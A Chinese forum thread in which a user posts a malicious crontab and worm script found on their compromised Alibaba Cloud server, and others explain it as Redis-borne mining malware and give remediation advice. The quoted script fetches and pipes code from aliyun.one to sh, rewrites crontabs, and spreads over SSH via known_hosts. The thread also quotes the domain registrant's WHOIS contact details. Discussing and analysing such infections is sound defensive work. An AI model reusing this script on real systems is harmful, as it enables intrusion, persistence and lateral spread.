• 请不要在回答技术问题时复制粘贴 AI 生成的内容

This topic created in 2374 days ago, the information mentioned may be changed or developed.

crontab -l：

*/15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one)|sh

aliyun.one

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh"|crontab - cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/ do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh >/dev/null 2>&1 &" & done fi fi done #

大佬们解释一下。

32 replies • 2019-12-06 14:52:39 +08:00

taolu

Nov 29, 2019

肉鸡复肉鸡

hadoop

Nov 29, 2019

挖矿？

taolu

Nov 29, 2019

@taolu #1 通俗讲，就是通过你这台主机，ssh 访问已知主机，碰到可以通过密钥登录的主机，就在那台主机执行这段代码

wangyzj

Nov 29, 2019

应该还有俩相关进程在活着吧

ppd

Nov 29, 2019

@wangyzj 是的，单独杀不掉

ppd

Nov 29, 2019

@taolu 密钥应该是没有暴漏出去的，感觉是通过前几年说的那个 redis 6379 端口搞进来的

wangyzj

Nov 29, 2019

@ppd 肉鸡无疑了
删文件
删 crontab
解决机器的安全问题

mcfog

Nov 29, 2019

如果你不具备信息安全知识，那么这个时候应该做的是销毁这个实例，修改所有这个实例上曾经存在的密钥、密码、token 等信息，重新学习信息安全知识以后再重新开一个实例正确地配置服务，以免损失继续扩大

eason1874

Nov 29, 2019

这么好的域名拿来干这个，可惜

wszgrcy

Nov 29, 2019 via Android

@taolu 那么可以反制手动劫持，控制那台用脚本控制的肉鸡？

taolu

Nov 29, 2019

@wszgrcy #10 密钥登录是单向的

qsbaq

Nov 29, 2019

肉鸡变成肉鸡

ppd

Nov 29, 2019

@wangyzj
阿里云提示
“该文件极有可能是黑客成功入侵服务器植入的，建议您先根据恶意脚本的标签检查文件内容的合法性并处理”

@taolu
果然是 redis 入侵导致的

进程异常行为-Linux 系统计划任务配置文件写入行为待处理
备注处理
该告警由如下引擎检测发现：
可疑文件路径：/var/spool/cron/temp-1391.rdb
进程路径：/usr/local/bin/redis-server
进程 PID：1391
事件说明：云盾检测到服务器的计划任务配置文件写入行为存在文件变动行为。如果该行为不是您自己主动运行，可能是黑客在尝试向服务器中注入自动计划任务用于持久化入侵，请及时检查告警中的目录文件中是否含有恶意代码。

shmilypeter

Nov 29, 2019

备份好文件之后销毁实例，重装吧

ppd

Nov 29, 2019

@mcfog
@shmilypeter

无需销毁，有备份镜像

realpg

PRO

Nov 29, 2019

我猜你是 centos

Suvigotimor

Nov 29, 2019

我怀疑是 redis 无授权登录然后拿 root 之后设定的定时从远程代码托管网站获取肉鸡代码之后控制服务器的...这个好弄，找到它放文件的路径把源头删除了任务也删了，其他的清清重启就好了，redis 一定设置好授权。

okwork

Nov 29, 2019 via Android

楼主在安全组里放行了外网的 6379 端口访问？

mink

Nov 29, 2019

之前我用 docker 拉了 redis 镜像，也是被挖矿了。

mcfog

Nov 29, 2019

@ppd 销毁是因为你没有这个能力审计出对方到底做了什么事情留了哪些后门，销毁重建是这种情况下最经济的做法
即使你有信息安全能力，一样应当备份这个被攻击的镜像（离线研究）后销毁这个实例

ppd

Nov 29, 2019

@realpg
你猜对了

Tezos

Nov 29, 2019 via iPhone

@realpg centos 不背这个锅

file0X0088

Nov 29, 2019

电话:+86.17006757575+86.013705182121
注册者:qiu gengmingChong Min She
注册机构:qiu gengmingSheChongMin
邮箱:[email protected]@qq.com

file0X0088

Nov 29, 2019

这个人不太小心啊，信息都暴露了

ppd

Nov 29, 2019

@okwork 是的

FS1P7dJz

Nov 29, 2019

@file0X0088 并不一定是真实信息

opengps

Nov 29, 2019 via Android

这个是定向冒充阿里云的挖矿吧

superrichman

Nov 29, 2019

这 cron job 想跟病毒一样到处传播。

话说这是第几个 redis 开放公网端口被入侵了的。

anyforever

Nov 30, 2019

@opengps +1

4cce1er

Dec 1, 2019

通过 redis 种木马有两个条件：
1. 空密码并且允许外部直接连接(bind 0.0.0.0)
2. redis 是 root 权限运行的

vone

Dec 5, 2019

大数字是在哪里拦截的
360Netlab Sinkhole Project
这个页面是 360 网络安全研究院安全 DNS 项目的安全提示页面。
常见问题
Q: 这个页面是干什么的？
这个页面是 360 网络安全研究院（ 360netlab ）用来重定向不安全域名的页面，您访问到这个页面说明您访问的域名(aliyun.one)可能存在不安全行为。
不安全行为的域名类型包括但不限于僵尸网络的主控服务器域名，恶意程序的挖矿域名，钓鱼域名以及其他包含不安全行为的黑灰域名等等。
Q: 我是怎么到这个页面的？
您使用了 360 公司的安全 DNS 服务之后，安全 DNS 会自动对您请求的域名是否安全进行判定，如果域名被判定为不安全就会跳转到这个页面。
Q: 你们错误拦截了合法域名，怎么解封？
360 安全 DNS 仅拦截对用户有不安全行为的域名，在保证用户的上网体验的同时，提高用户上网的安全性。
阻断的域名列表是 360netlab 利用多种技术手段自动化生成的，并不会基于网站具体内容决定是否拦截。
如果您是域名的所有者并确定自己的域名没有不安全行为，请点击此处发送邮件到 sinkhole#360.cn(发邮件之前，请把#替换为 @) ，请在邮件中简要说明域名的功能和用途，并注意确保邮件中标明你要解封的域名
关于 360 网络安全研究院（ 360netlab ）
欢迎访问我们的网站 360 网络安全研究院（ 360netlab ）。

感谢您使用 360 安全 DNS 服务。

lifespy

Dec 6, 2019

前几天我就发现了。然后我还在隔壁论坛发了个帖子

阿里云服务器被注入了一个 job，有人知道是什么么

crontab -l：

aliyun.one